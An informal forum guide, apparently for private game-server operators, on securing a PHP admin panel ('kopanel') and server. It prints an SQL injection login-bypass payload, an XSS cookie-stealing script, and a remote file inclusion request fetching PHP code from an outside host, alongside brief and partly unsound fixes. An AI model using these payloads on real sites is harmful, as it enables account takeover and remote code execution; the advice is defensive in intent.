KOPANEL:
Well, kopanels what u downloaded from ragezone or u got it from someone else is just not SECURE because its source is known by other ppl so if they find a vulnerability they can hack u anytime...
I suggest you to write your own kopanels BUT:
make sure you dont allow any kind of XSS sql injections in it, file uploading or rfi security hole.
If you dont know anything about php then kopanel is ok for u but it sill has some security problems.
Before you add something to your kopanel look at the code it may contain dangerous code.
How to secure your panel from sql injection?
Test() all $_POST and $_GET data in the source.
What about XSS attacks?
Disable the javascript on some parts of your kopanel.
Exampe for sql injection:
in login.php
$msquery="SELECT COUNT(strACcountID) FROM tb_user WHERE strACcountID = '$login' AND strPasswd = '$pass'";
so if i write in login gerydeft' or '1'='1 and in password pass' or '1'='1 our query will look like this:
$msquery="SELECT COUNT(strACcountID) FROM tb_user WHERE strACcountID = 'gerydeft' or '1'='1' AND strPasswd = 'pass' or '1'='1'";
becaze 1 is always equals to 1 it will log me in on gerydeft's acc
(this is just a typical sql injection there are alot of way to execute this hack.)
U could say i cant insert this long sting because
<td>User:</td>
<td><input type="text" class="input" name="user" value=""
maxlength="12" size="12"></td>
Thats false.This is client side code so i can edit it as i want.
So what is the way to fix it?
If u have heteric's anti_sqlinjection.php
then include it and test() all get an post data
How an XSS attack(Cross site scripting) looks like?
plenty places on the web input fields are vulnerable for this hack.
for example i would write <script>alert(document.cookie)</script>
this script is in the source and if ragezone wouldnt secure now i could steal your accounts.
how?i would send your cookies to my server and inject it.
XSS attack can only execute client side script, not server side.
What about server side PHP scripts?
There is a hack called RFI(Remote File include)
like a php say:
vuln.php:
PHP Code:
<?php
include($_GET["act"]);
?>
so i execute: vuln.php?act=http://mysite.com/phpcode.txt
and all php codes in my txt would run.
One more suggestion:Always use the most recent php version and dont leave server.ini in your www folder
(or anybody can read it)
PORTS:
Well if u have router basically most ports are closed but, if u dont have i suggest u to install a firewall
and close some these ports:
21 ftp (only if ur server doenst use this)
23 telnet
1433 mssql
3306 mysql
be careful dont close gameports or 80 or your website will be down
Also dont let remote or ur server rather use VNC or temaviewer and if u can only let connections from u
Change your mssql password once a week and never test somethig on your own server, rather test it on your pc.
If u got DDoSd closing ports also a way to fix it.
Often make backup once or twice a week..
FORUM:
Forums are also a vunerably systems of your server.
I suggest u to use an external forum, and do not store passwords or anything important in ur PM box.
Disable xp_cmdshell command in your mssql database.
Also disable net.exe and net2.exe in system32 folder
Gl with your server, sry for my grammar iam not english man^^
